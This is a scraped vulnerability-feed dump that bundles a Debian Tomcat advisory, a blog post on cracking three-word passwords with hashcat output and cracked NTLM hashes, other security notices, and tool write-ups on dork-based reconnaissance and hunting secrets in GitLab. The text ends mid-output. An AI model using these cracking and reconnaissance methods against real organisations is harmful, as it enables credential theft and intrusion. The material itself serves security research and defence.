Aldrin Martoq has discovered a denial of service (DoS) vulnerability in
Apache Tomcat 4.0.x. Sending several non-HTTP requests to Tomcat's HTTP
connector makes Tomcat reject further requests on this port until it is
restarted.
For the current stable distribution (woody) this problem has been fixed
in version 4.0.3-3woody3.
For the unstable distribution (sid) this problem does not exist in the
current version 4.1.24-2.
We recommend that you upgrade your tomcat4 packages and restart the
tomcat server.
Upgrade Instructions
wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.
If you are using the apt-get package manager, use the line for
sources.list as given below:
apt-get update
will update the internal database
apt-get upgrade
will install corrected packages
You may use an automated update by adding the resources from the
footer to the proper configuration.
These files will probably be moved into the stable distribution on
its next revision.
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
{"id": "DEBIAN:DSA-395-1:39A75", "bulletinFamily": "unix", "title": "[SECURITY] [DSA 395-1] New tomcat4 packages fix denial of service", "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 395-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nOctober 15th, 2003 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : tomcat4\nVulnerability : incorrect input handling\nProblem-Type : remote\nDebian-specific: no\n\nAldrin Martoq has discovered a denial of service (DoS) vulnerability in\nApache Tomcat 4.0.x. Sending several non-HTTP requests to Tomcat's HTTP\nconnector makes Tomcat reject further requests on this port until it is\nrestarted.\n\nFor the current stable distribution (woody) this problem has been fixed\nin version 4.0.3-3woody3.\n\nFor the unstable distribution (sid) this problem does not exist in the\ncurrent version 4.1.24-2.\n\nWe recommend that you upgrade your tomcat4 packages and restart the\ntomcat server.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/contrib/t/tomcat4/tomcat4_4.0.3-3woody3.dsc\n Size/MD5 checksum: 708 64c5aa3e586635edcd2678d10ab809d2\n http://security.debian.org/pool/updates/contrib/t/tomcat4/tomcat4_4.0.3-3woody3.diff.gz\n Size/MD5 checksum: 16223 bafcad535ede73b939b31e32be50ca9b\n http://security.debian.org/pool/updates/contrib/t/tomcat4/tomcat4_4.0.3.orig.tar.gz\n Size/MD5 checksum: 1588186 2b2e0d859f7152e5225633933e6585d6\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/contrib/t/tomcat4/libtomcat4-java_4.0.3-3woody3_all.deb\n Size/MD5 checksum: 1134260 e667be7a8c67c26834069f15dd93f616\n http://security.debian.org/pool/updates/contrib/t/tomcat4/tomcat4-webapps_4.0.3-3woody3_all.deb\n Size/MD5 checksum: 1164474 9b3283713a2de35d7647f4b9e9820c99\n http://security.debian.org/pool/updates/contrib/t/tomcat4/tomcat4_4.0.3-3woody3_all.deb\n Size/MD5 checksum: 126724 39150e4598d20ed52d49a470d2d8ce7b\n\n\n These files will probably be moved into the stable distribution on\n its next revision.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "published": "2003-10-15T00:00:00", "modified": "2003-10-15T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2003/msg00203.html", "reporter": "Debian", "references": [], "cvelist": [], "type": "debian", "lastseen": "2018-10-16T22:13:38", "edition": 1, "viewCount": 2, "enchantments": {"score": {"value": 0.5, "vector": "NONE", "modified": "2018-10-16T22:13:38", "rev": 2}, "dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "pentestit", "idList": ["PENTESTIT:4724A04D183972A5F54CF1B5ECE50CD7"]}, {"type": "kitploit", "idList": ["KITPLOIT:5624592253315055918", "KITPLOIT:1882022258915021920", "KITPLOIT:6136053922090931746"]}, {"type": "mssecure", "idList": ["MSSECURE:AC5FF665FC7D44097EDE2A1D4E9171CF"]}, {"type": "threatpost", "idList": ["THREATPOST:9CC427FD799628736019D1DA0818374B", "THREATPOST:A7995232CE91305C94B84BB400B1EA34"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0786-1", "OPENSUSE-SU-2020:0780-1", "OPENSUSE-SU-2020:0785-1", "OPENSUSE-SU-2020:0784-1", "OPENSUSE-SU-2020:0778-1", "OPENSUSE-SU-2020:0779-1", "OPENSUSE-SU-2020:0781-1"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2239-1:56917", "DEBIAN:DLA-2238-1:3B63E"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:1AD336AC246CB047F3348DC0B00B2A92"]}, {"type": "thn", "idList": ["THN:53CE09A565F7207DDD05DFEDE00CDEC6"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:157980"]}], "modified": "2018-10-16T22:13:38", "rev": 2}, "vulnersScore": 0.5}, "affectedPackage": [{"OS": "Debian", "OSVersion": "3", "arch": "all", "operator": "lt", "packageFilename": "tomcat4_4.0.3-3woody3_all.deb", "packageName": "tomcat4", "packageVersion": "4.0.3-3woody3"}]}
{"pentestpartners": [{"lastseen": "2021-01-19T08:26:24", "bulletinFamily": "blog", "cvelist": [], "description": "### \n\n### Introduction\n\nThe National Cyber Security Centre (NCSC) have advocated the use of three random words for several years to create strong passwords, and that advice has been repeated recently by the National Crime Agency, and multiple police forces in the UK\u2026. but just how strong are these passwords?\n\nBefore we go there, we should acknowledge that most people have one or two weak passwords that they use on multiple sites & systems. One of those is breached, which results in other accounts being compromised through password stuffing. The NCSC advice is good in comparison to that low bar.\n\nBut we were surprised to see that password managers weren\u2019t in the top 5 actions from NCSC. Here\u2019s why they are so important:\n\n### The numbers\n\nThe English language has a huge number of words \u2013 the online [Oxford English Dictionary](<https://www.oed.com/>) has over 600,000 words however only around 171,000 are in current use. If we chose three random words from the words in current use, we\u2019d have a search space of around 5,000 trillion. Yes, that is a lot, but modern GPUs are fast\u2026 really fast. One of our dedicated password crackers can search about 20 billion passwords every second from a disk-based wordlist (hashcat benchmark is about 185 GH/s). At that speed we could crack a three-word password in around 4 days.\n\nThe problem with this advice is that no one knows 171,000 words. Estimates for the number of words that a university-educated person knows is around 40,000 words, so we created a dictionary with the 66,000 most commonly-used words hoping that would cover most of the words that most people would tend to choose, and this reduced our search space by about 17 times allowing us to search all likely three word passwords in only 6 hours! Hmmm, it\u2019s not looking good for ThreeRandomWords\u2026\n\n### Official recommendation\n\n\n\n##### **Source: **<https://www.ncsc.gov.uk/cyberaware/home>\n\n \n\nWe took an interest in the example password of \u201cRedPantsTree\u201d given on the NCSC site. All of these words are easily in the top 30,000 most common words, but we decided to attack it with our big dictionary to simulate a more realistic attack time. We also added in the NTLM hash for \u201cSuperfluousExonerateSerendipity\u201d to show that even choosing less commonly thought of words is still an issue.\n\nThe NCSC password was cracked in about 4 hours, with the whole search space, including our uncommon three-word password, completed in around 6.5 hours.\n \n \n MMMSession..........: papa_WWW\n Status...........: Running\n Hash.Name........: NTLM\n Hash.Target......: /home/papa/threerandomwords.ntlm\n Time.Started.....: Wed Jan\u00a0 6 12:28:06 2021 (4 hours, 8 mins)\n Time.Estimated...: Wed Jan\u00a0 6 19:15:33 2021 (2 hours, 38 mins)\n Guess.Base.......: File (/opt/dictionaries/papa/english-66k-upperupper.txt), Left Side\n Guess.Mod........: File (/opt/dictionaries/papa/english-66k-upper.txt), Right Side\n Recovered........: 0/3 (0.00%) Digests\n Progress.........: 272600599101440/427621521183219 (63.75%)\n Rejected.........: 0/272600599101440 (0.00%)\n Restore.Point....: 3616604160/5675964921 (63.72%)\n Candidates.#1....: OwainLawyersAugury -> OwenSuckedAvertir\n Candidates.#2....: OviedoClaudianLatex -> OwainLawyerLeahy\n Candidates.#3....: OverysselSightedPreviously -> OviedoClaudiaProclamations\n Candidates.#4....: OverworkInterrogationsWiry -> OverysselSightWo\n \n **de947fd0bbd9f4f5c65a5d802cae1597:RedPantsTree**\n **.**\n **.**\n **f654100d842b2f6f68efeddcec2973bb:SuperfluousExonerateSerendipity**\n\n### CorrectHorseBatteryStaple\n\n\n\n##### **Source:** <https://xkcd.com/936/>\n\n \n\nWhat about using four words\u2026 does that work? Well, it does make things more difficult, but again it depends on how commonly used the words are, and how big the attackers dictionary is. The first three words of the xkcd example are really common and appear in the top 5,000 of every frequency list that I\u2019ve seen. Staple is less common and is usually in position 18,000 to 20,000. So to actually crack that specific four word password encoded as an NTLM hash, would take about 5 months on one of our password cracking servers.\n\n### Cracking characteristics\n\nAlthough it only takes about 6 hours to run through all of the three-word passwords, that is exclusively for words with an uppercase first character. If we want to crack all lowercase, that would be an extra 6 hours, add a \u201c1\u201d or a \u201c!\u201d at the end, and that\u2019s an extra 6 hours. So, if an attacker compromised your Windows domain and everyone was using NCSC recommendations would it take forever to crack? Well, counterintuitively, it takes the same amount of time to crack 1,000 passwords as it takes to crack just 1, so if your NTLM hashes are compromised, within a couple of days, an attacker would have compromised most of your passwords. With the NCSC advice to also not expire passwords, cracking even a four-word password in 5 months could still be an issue.\n\n### What to do?\n\nAt Pen Test Partners, out IT team install a password manager by default on all managed devices. A password manager creates randomly-generated passwords that are super strong, and encrypts them for secure storage. I have no idea what 99% of my passwords are \u2013 they are all stored in my password manager, and it really doesn\u2019t matter that I don\u2019t know what they are. The password manager logs me into any system I need, quicker than I could type amonie and Password1!\n\nFor more sensitive systems, and anything that\u2019s internet-facing, we also advise the use of Two-Factor Authentication (2FA). That means that even if your password is compromised, an attacker still can\u2019t log in without your secondary authentication.\n\nIf you manage a Windows domain, we also recommend doing regular password audits. Our [password auditing tool, Papa](<https://www.pentestpartners.com/penetration-testing-services/papa/>), now checks for three random word passwords in various formats and we spend several days of cracking time now, just on the three-word passwords.\n\nThe post [Security Blog](<https://www.pentestpartners.com/security-blog/>) first appeared on [Pen Test Partners](<https://www.pentestpartners.com>).", "modified": "2021-01-19T06:00:04", "published": "2021-01-19T06:00:04", "id": "PENTESTPARTNERS:943CE476724D136E53A4D3E7882695D1", "href": "https://www.pentestpartners.com/security-blog/three-word-passwords/", "type": "pentestpartners", "title": "Three Word Passwords", "cvss": {"score": 0.0, "vector": "NONE"}}], "fedora": [{"lastseen": "2021-01-19T06:33:09", "bulletinFamily": "unix", "cvelist": [], "description": "flatpak is a system for building, distributing and running sandboxed desktop applications on Linux. See https://wiki.gnome.org/Projects/SandboxedApps for more information. ", "modified": "2021-01-19T01:52:27", "published": "2021-01-19T01:52:27", "id": "FEDORA:B6BE0309FF1D", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 32 Update: flatpak-1.8.5-1.fc32", "cvss": {"score": 0.0, "vector": "NONE"}}], "debian": [{"lastseen": "2021-01-19T01:18:34", "bulletinFamily": "unix", "cvelist": [], "description": "- -----------------------------------------------------------------------\nDebian LTS Advisory DLA-2528-1 debian-lts@lists.debian.org\nhttps://www.debian.org/lts/security/ Utkarsh Gupta\nJanuary 19, 2021 https://wiki.debian.org/LTS\n- -----------------------------------------------------------------------\n\nPackage : gst-plugins-bad1.0\nVersion : 1.10.4-1+deb9u1\nCVE ID : not yet available\n\nAndrew Wesie discovered a buffer overflow in the H264 support of the\nGStreamer multimedia framework, which could potentially result in the\nexecution of arbitrary code.\n\nFor Debian 9 stretch, this problem has been fixed in version\n1.10.4-1+deb9u1.\n\nWe recommend that you upgrade your gst-plugins-bad1.0 packages.\n\nFor the detailed security status of gst-plugins-bad1.0 please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/gst-plugins-bad1.0\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 1, "modified": "2021-01-18T21:48:41", "published": "2021-01-18T21:48:41", "id": "DEBIAN:DLA-2528-1:13C36", "href": "https://lists.debian.org/debian-lts-announce/2021/debian-lts-announce-202101/msg00016.html", "title": "[SECURITY] [DLA 2528-1] gst-plugins-bad1.0 security update", "type": "debian", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-01-19T01:17:50", "bulletinFamily": "unix", "cvelist": [], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4833-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nJanuary 18, 2021 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : gst-plugins-bad1.0\nCVE ID : not yet available\n\nAndrew Wesie discovered a buffer overflow in the H264 support of the\nGStreamer multimedia framework, which could potentially result in the\nexecution of arbitrary code.\n\nFor the stable distribution (buster), this problem has been fixed in\nversion 1.14.4-1deb10u1.\n\nWe recommend that you upgrade your gst-plugins-bad1.0 packages.\n\nFor the detailed security status of gst-plugins-bad1.0 please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/gst-plugins-bad1.0\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 1, "modified": "2021-01-18T21:31:30", "published": "2021-01-18T21:31:30", "id": "DEBIAN:DSA-4833-1:6E7A2", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2021/msg00012.html", "title": "[SECURITY] [DSA 4833-1] gst-plugins-bad1.0 security update", "type": "debian", "cvss": {"score": 0.0, "vector": "NONE"}}], "kitploit": [{"lastseen": "2021-01-19T09:37:39", "bulletinFamily": "tools", "cvelist": ["CVE-2020-0646"], "description": "[  ](<https://1.bp.blogspot.com/-1de0aBPNIWk/YAUWk6HkngI/AAAAAAAAVBA/s_ZSe7IlI7IkK-BtzxPMSmMHzAoV1_H6QCNcBGAsYHQ/s1200/BigBountyRecon_1.png>)\n\n \n\n\nBigBountyRecon tool utilises 58 different techniques using various Google dorks and open source tools to expedite the process of initial reconnaissance on the target organisation. Reconnaissance is the most important step in any [ penetration testing ](<https://www.kitploit.com/search/label/Penetration%20Testing> \"penetration testing\" ) or a bug hunting process. It provides an attacker with some preliminary knowledge on the target organisation. Furthermore, it will be useful to gain insights into what controls are in place as well as some rough estimations on the security maturity level of the target organisation. \n\nThis tool can be used in addition to your usual approach for bug hunting. The idea is to quickly check and gather information about your target organisation without investing time and remembering these syntaxes. In addition, it can help you define an approach towards finding some quick wins on the target. \n\nAny suggestions or ideas for this tool are welcome - just tweet me on [ @ManiarViral ](<https://twitter.com/maniarviral> \"@ManiarViral\" )\n\n \n\n\n** Techniques ** \n\n\n 1. Directory Listing: Finding open directories using Google Dork on your target organisation helps one to understand the directory structure on the webserver. It may reveal [ sensitive information ](<https://www.kitploit.com/search/label/Sensitive%20Information> \"sensitive information\" ) or it may lead to information disclosure. \n\n 2. Configuration Files: Often times configuration files contains sensitive information such as hardcoded passwords, sensitive drive locations or API tokens which can help you gain privilege access to the internal resources. \n\n 3. Database Files: Database Files are data files that are used to store the contents of the database in a structured format into a file in separate tables and fields. Depending on the nature of the web application these files could provide access to sensitive information. \n\n 4. WordPress: WordPress is an open-source CMS written in PHP. WordPress has thousands of plugins to build, customise and enhance the websites. There are numerous [ vulnerabilities ](<https://www.kitploit.com/search/label/vulnerabilities> \"vulnerabilities\" ) in these plugins. Finding WordPress related \n\n 5. Log Files: Log files sometimes provide detailed information of the users' activities in a particular application. These files are good to look at session cookies or other types of tokens. \n\n 6. Backup and Old Files: Backup files are original copies of the critical systems. These provide access to PII or access to sensitive records. \n\n 7. Login Pages: It is extremely important to identify login pages of your target organisation to perform bruteforce attempts or trying [ default credentials ](<https://www.kitploit.com/search/label/Default%20Credentials> \"default credentials\" ) to gain further access to organisation resources. \n\n 8. SQL Errors: SQL errors leaks sensitive information about the backend systems. This can help one to perform enumeration on the database types and see if the application is vulnerable to input validation related attacks such as SQL Injection. \n\n 9. Apache Config Files: Apache HTTP Server is configured by placing directives in plain text configuration files. The main configuration file is usually called httpd.conf. In addition, other configuration files may be added using the Include directive, and wildcards can be used to include many configuration files. Any directive may be placed in any of these configuration files. Depending on the entries in these config files it may reveal database connection strings, username and passwords, the internal workings, used and referenced libraries and business logic of application. \n\n 10. Robots.txt File: Robots.txt file instructs web robots how to crawl pages on their website. Depending on the content of the file, an attacker might discover hidden directories and files. \n\n 11. DomainEye: DomainEye is a domain/host investigation tool that has the largest domain databases. They provide services such as reverse Whois, reverse IP lookup, as well as reverse NS and MX. \n\n 12. Publicly Exposed Documents: Such documents can be used to extract metadata information. \n\n 13. phpinfo(): Exposing phpinfo() on its own isn't necessarily a risk, but in combination with other vulnerabilities could lead to your site becoming compromised. Additionally, module versions could make attackers life easier when targeting application using newly discovered exploits. \n\n 14. Finding Backdoors: This can help one to identify website defacements or server hijacking related issues. By exploiting the open redirect vulnerability on the trusted web application, the attacker can redirect victims to a phishing page. \n\n 15. Install/Setup Files: Such files allows an attacker to perform enumeration on the target organisation. Information gathered using these files can help discover version details which can then be used to perform the targeted exploit. \n\n 16. Open Redirects: With these, we look at various known parameters vulnerable to open redirect related issues. \n\n 17. Apache Struts RCE: Successfully exploiting an RCE vulnerability could allow the attacker to run arbitrary programs. Here, we are looking for files with extensions of \".action\" or \".do\". \n\n 18. 3rd Party Exposure: Here we are looking for exposure of information on third party sites such as Codebeautify, Codeshare and Codepen. \n\n 19. Check Security Headers: Identify quickly if the target site is using security related headers in the server response. \n\n 20. GitLab: Quickly look for sensitive information on the GitLab. \n\n 21. Find Pastebin Entries: Shows you the results related to the target organisation on the Pastebin site. This could be passwords or any other sensitive information related to the target organisation. \n\n 22. Employees on LINKEDIN: Identifying employee names on LinkedIn can help you build a username list when it comes to password spraying attack. \n\n 23. .HTACCESS / Sensitive Files: Look for sensitive file exposure. This may indicate a server misconfiguration. \n\n 24. Find Subdomains: Subdomain helps you expand the attack surface on the target organisation. There are numerous tools available to automate the process of subdomain enumeration. \n\n 25. Find Sub-Subdomains: Identify sub-sub domains on the target organisation using Google Dork, \n\n 26. Find WordPress related exposure: WordPress related exposure helps you gain access to sensitive files and folders. \n\n 27. BitBucket & Atlassian: Source code leakage, hardcoded credentials and access to cloud infrastructure. \n\n 28. PassiveTotal: PassiveTotal is a great tool to perform threat investigation. Using BigBountyRecon we will use PassiveTotal to identify subdomains on the target information. \n\n 29. Stackoverflow: Source code exposure or any technology-specific questions mentioned on the Stackoverflow. \n\n 30. Find WordPress related exposure using Wayback Machine: Look for archieved WordPress files using WaybackMachine. \n\n 31. GitHub: Quickly look for sensitive information on the GitHub. \n\n 32. OpenBugBounty: Look for publicly exposed security issues on the OpenBugBounty website. \n\n 33. Reddit: Information about the particular organisation on the Reddit platform. \n\n 34. Crossdomain.xml: Look for misconfigured crossdomain.xml files on the target organisation. \n\n 35. ThreatCrowd: Search engine for threats, however, we are going to use this to identify additional sub-domains. \n\n 36. .git Folder: Source code exposure. it's possible to download the entire repository content if accessible. \n\n 37. YouTube: Look for any recent news on Youtube. \n\n 38. Digitalocean Spaces: Spaces is an S3-compatible object storage service that lets you store and serve large amounts of data. We will look for any data exposures. \n\n 39. .SWF File (Google): Flash is dead. We are going to use Google Dorks to look for older versions of flash .swf's which contain vulnerabilities. \n\n 40. .SWF File (Yandex): Flash is dead. We are going to use Yandex to look for older versions of flash .swf's which contain vulnerabilities. \n\n 41. .SWF File (Wayback Machine): Flash is dead. We are going to use WaybackMachine to look for older versions of flash .swf's which contain vulnerabilities. \n\n 42. Wayback Machine: Look for archived files to access old files. \n\n 43. Reverse IP Lookup: Reverse IP Lookup lets you discover all the domain names hosted on any given IP address. This will help you to explore the attack surface for a target organisation. \n\n 44. Traefik: Look for an open-source Edge Router for an unauthenticated interface which exposes internal services. \n\n 45. Cloud Storage and Buckets: Google CSE for various cloud storages - aws, digitalocean, backblaze, wasabi, rackspace, dropbox, ibm, azure, dreamhost, linode, gcp, box, mailru \n\n 46. s3 Buckets: Open s3 buckets. \n\n 47. PublicWWW: Source code search engine indexes the content of over 200 million web sites and provides a query interface that lets the caller find any alphanumeric snippet, signature or keyword in the web pages \u2018HTML\u2019, \u2018JavaScript\u2019 and \u2018CSS\u2019 style sheet code. \n\n 48. Censys (IPv4, Domains & Certs): Search engine for finding internet devices. We will use this to look for additional sub-domains using various endpoints on Censys. \n\n 49. Shodan: Search engine for Internet-connected devices \n\n 50. SharePoint RCE: Look for CVE-2020-0646 SharePoint RCE related endpoint. \n\n 51. API Endpoints: Find WSDL files. \n\n 52. Gist Searches: Quickly look for sensitive information on the Gist pastes. \n\n 53. CT Logs: [ Certificate Transparency ](<https://www.kitploit.com/search/label/Certificate%20Transparency> \"Certificate Transparency\" ) (CT) is an Internet security standard and open-source framework for monitoring and auditing digital certificates. We will use to look for additional sub-domains for a targeted organisation. \n\n 54. Password Leak: Look for plaintext passwords of internal employees exposed in various leaks. \n\n 55. What CMS: Identify the version and type of CMS used by a target organisation for targeted enumeration and exploit research. \n\n \n** Screenshots ** \n\n\nSearch for plaintext passwords for a target organisation: \n\n \n\n\n[  ](<https://1.bp.blogspot.com/-a7bDrZPQamY/YAUWr80XooI/AAAAAAAAVBE/uxMttZ7hKTMMyMSAS_EHEeMjZHgMbeFawCNcBGAsYHQ/s1849/BigBountyRecon_2.png>)\n\n \n\n\nLooking for subdomains and other interesting information on the target organisation: \n\n \n\n\n[  ](<https://1.bp.blogspot.com/-dNYvaIk2FvU/YAUWwfzC2hI/AAAAAAAAVBI/_1VYpz-7eDkXb6ttrQxG6kA1eDHGUeJZACNcBGAsYHQ/s1687/BigBountyRecon_3.png>)\n\nFinding Apache Struts related assets: \n\n \n\n\n[  ](<https://1.bp.blogspot.com/-NP0ZVmNjuhc/YAUWziDsUZI/AAAAAAAAVBM/iL8sdo6Ymysr6Q0wO5AOmDIsTQoQvjIWACNcBGAsYHQ/s1610/BigBountyRecon_4.png>)\n\n \n\n\nVerifying if the URL contains extenstion of \".do\": \n\n \n\n\n[  ](<https://1.bp.blogspot.com/-B96MKuKMQEI/YAUW2gPCWCI/AAAAAAAAVBU/J07KZmZOJOssCl7rNyZeyiOKQgWyaySDgCNcBGAsYHQ/s1633/BigBountyRecon_5.png>)\n\n \n\n\n** How to use this tool? ** \n\n\nStep1: Download the file from Release section: [ https://github.com/Viralmaniar/BigBountyRecon/releases/download/v0.1/BigBountyRecon.exe ](<https://github.com/Viralmaniar/BigBountyRecon/releases/download/v0.1/BigBountyRecon.exe> \"https://github.com/Viralmaniar/BigBountyRecon/releases/download/v0.1/BigBountyRecon.exe\" )\n\nStep2: Run the EXE file \n\nStep3: Enter the target domain \n\nStep4: Click on different buttons in the tool to find information \n\nStep5: In case of Google Captcha simply click on the puzzle and move ahead \n\n \n** Questions? ** \n\n\nTwitter: [ https://twitter.com/maniarviral ](<https://twitter.com/maniarviral> \"https://twitter.com/maniarviral\" ) \nLinkedIn: [ https://au.linkedin.com/in/viralmaniar ](<https://au.linkedin.com/in/viralmaniar> \"https://au.linkedin.com/in/viralmaniar\" )\n\n \n** Dorking operators across Google, DuckDuckGo, Yahoo and Bing ** \n\n\nTable obtained from: [ https://exposingtheinvisible.org/guides/google-dorking/ ](<https://exposingtheinvisible.org/guides/google-dorking/> \"https://exposingtheinvisible.org/guides/google-dorking/\" )\n\nHere is a table with possible dorks for various search engines. \n\nDork | Description | Google | DuckDuckGo | Yahoo | Bing \n---|---|---|---|---|--- \ncache:[url] | Shows the version of the web page from the search engine\u2019s cache. | \u2713 | | | \nrelated:[url] | Finds web pages that are similar to the specified web page. | \u2713 | | | \ninfo:[url] | Presents some information that Google has about a web page, including similar pages, the cached version of the page, and sites linking to the page. | \u2713 | | | \nsite:[url] | Finds pages only within a particular domain and all its subdomains. | \u2713 | \u2713 | \u2713 | \u2713 \nintitle:[text] or allintitle:[text] | Finds pages that include a specific keyword as part of the indexed title tag. You must include a space between the colon and the query for the operator to work in Bing. | \u2713 | \u2713 | \u2713 | \u2713 \nallinurl:[text] | Finds pages that include a specific keyword as part of their indexed URLs. | | \u2713 | | \nmeta:[text] | Finds pages that contain the specific keyword in the meta tags. | | | | \nfiletype:[file extension] | Searches for specific file types. | \u2713 | \u2713 | | \u2713 \nintext:[text], allintext:[text], inbody:[text] | Searches text of page. For Bing and Yahoo the query is inbody:[text]. For DuckDuckGo the query is intext:[text]. For Google either intext:[text] or allintext:[text] can be used. | \u2713 | \u2713 | | \u2713 \ninanchor:[text] | Search link anchor text | \u2713 | | | \nlocation:[iso code] or loc:[iso code], region:[region code] | Search for specific region. For Bing use location:[iso code] or loc:[iso code] and for DuckDuckGo use region:[iso code].An iso location code is a short code for a country for example, Egypt is eg and USA is us. [ https://en.wikipedia.org/wiki/ISO_3166-1 ](<https://en.wikipedia.org/wiki/ISO_3166-1> \"https://en.wikipedia.org/wiki/ISO_3166-1\" ) | | \u2713 | | \u2713 \ncontains:[text] | Identifies sites that contain links to filetypes specified (i.e. contains:pdf) | | | | \u2713 \naltloc:[iso code] | Searches for location in addition to one specified by language of site (i.e. pt-us or en-us) | | | | \u2713 \nfeed:[feed type, i.e. rss] | Find RSS feed related to search term | | \u2713 | \u2713 | \u2713 \nhasfeed:[url] | Finds webpages that contain both the term or terms for which you are querying and one or more RSS or Atom feeds. | \u2713 | \u2713 | | \u2713 \nip:[ip address] | Find sites hosted by a specific ip address | | | \u2713 | \u2713 \nlanguage:[language code] | Returns websites that match the search term in a specified language | | \u2713 | \u2713 | \nbook:[title] | Searches for book titles related to keywords | \u2713 | | | \nmaps:[location] | Searches for maps related to keywords | \u2713 | | | \nlinkfromdomain:[url] | Shows websites whose links are mentioned in the specified url (with errors) | | | | \u2713 \n \n** Contribution **\n\nAny suggestions or ideas for this tool are welcome - just tweet me on [ @ManiarViral ](<https://twitter.com/maniarviral> \"@ManiarViral\" )\n\n \n \n\n\n** [ Download BigBountyRecon ](<https://github.com/Viralmaniar/BigBountyRecon> \"Download BigBountyRecon\" ) **\n", "edition": 1, "modified": "2021-01-18T20:30:02", "published": "2021-01-18T20:30:02", "id": "KITPLOIT:4480301396595295532", "href": "http://www.kitploit.com/2021/01/bigbountyrecon-this-tool-utilises-58.html", "title": "BigBountyRecon - This Tool Utilises 58 Different Techniques To Expediate The Process Of Intial Reconnaissance On The Target Organisation", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-18T15:31:28", "bulletinFamily": "tools", "cvelist": [], "description": "[  ](<https://1.bp.blogspot.com/-CQi2hv4nrPs/X_u6C2h_NnI/AAAAAAAAU_Q/o2IKYB4S5i81eV09osQvuALsOHQLYZzcwCNcBGAsYHQ/s800/gitlab_hacks.png>)\n\n \n\n\nCollect OSINT for [ GitLab groups ](<https://docs.gitlab.com/ee/user/group/> \"GitLab groups\" ) and [ members ](<https://docs.gitlab.com/ee/user/project/members/#share-project-with-group> \"members\" ) and search the group and group members' [ snippets ](<https://docs.gitlab.com/ee/user/snippets.html> \"snippets\" ) , [ issues ](<https://docs.gitlab.com/ee/user/project/issues/> \"issues\" ) , and [ issue discussions ](<https://docs.gitlab.com/ee/api/discussions.html#discussions-api> \"issue discussions\" ) for sensitive data that may be included in these assets. The information gathered is intended to compliment and inform the use of additional tools such as [ TruffleHog ](<https://github.com/dxa4481/truffleHog> \"TruffleHog\" ) or [ GitRob ](<https://github.com/michenriksen/gitrob> \"GitRob\" ) , which search git commit history using a similar technique of regular expression matching. \n\n \n\n\n** How the tool works ** \n\n\nStart by providing a group ID for a specific group on GitLab. You can find the group ID underneath the group name in the GitLab UI. Token-Hunter will use the GitLab group ID to find all associated projects for that group and, optionally, the groups members personal projects. Configure the tool to look for sensitive data in assets related to the projects it finds. Token-Hunter uses the [ same set of ](<https://github.com/dxa4481/truffleHogRegexes> \"same set of\" ) [ regular expressions ](<https://www.kitploit.com/search/label/Regular%20Expressions> \"regular expressions\" ) as TruffleHog with a few additions for GitLab specific tokens. Token-Hunter depends on these [ easily configurable regular expressions ](<https://gitlab.com/gitlab-com/gl-security/gl-redteam/token-hunter/blob/master/regexes.json> \"easily configurable regular expressions\" ) for [ accuracy ](<https://www .kitploit.com/search/label/Accuracy> \"accuracy\" ) and effectiveness. Currently, the tool supports GitLab snippets, issues, and issue discussions with plans for future expansion to other assets. The tool is intended to be very configurable to allow for efficient [ discovery ](<https://www.kitploit.com/search/label/Discovery> \"discovery\" ) of sensitive data in the assets you're specifically interested in. \n\n \n** Usage ** \n\n\nBefore running the tool, you will need to [ generate a GitLab Personal ](<https://docs.gitlab.com/ee/user/profile/personal_access_tokens.html> \"generate a GitLab Personal\" ) [ Access Token ](<https://www.kitploit.com/search/label/Access%20Token> \"Access Token\" ) (PAT) and export it as an environment variable. This can be done as shown below (please select ` api ` in the ` scopes ` section): \n \n \n export GITLAB_API_TOKEN=xxxxx \n \n\nNext, clone the repository and install dependencies with: \n \n \n git clone https://gitlab.com/gitlab-com/gl-security/gl-redteam/token-hunter.git \n pip3 install -r ./requirements.txt \n \n\nThen, you can run the tool and specify your options as follows: \n \n \n usage: token-hunter.py [-h] -g GROUP [-u URL] [-m] [-s] [-i] [-r] [-t] \n [-p PROXY] [-c CERT] [-l LOGFILE] \n \n Collect OSINT for GitLab groups and members. Optionally search the group and \n group members snippets, project issues, and issue discussions/comments for \n sensitive data. \n \n optional arguments: \n -h, --help 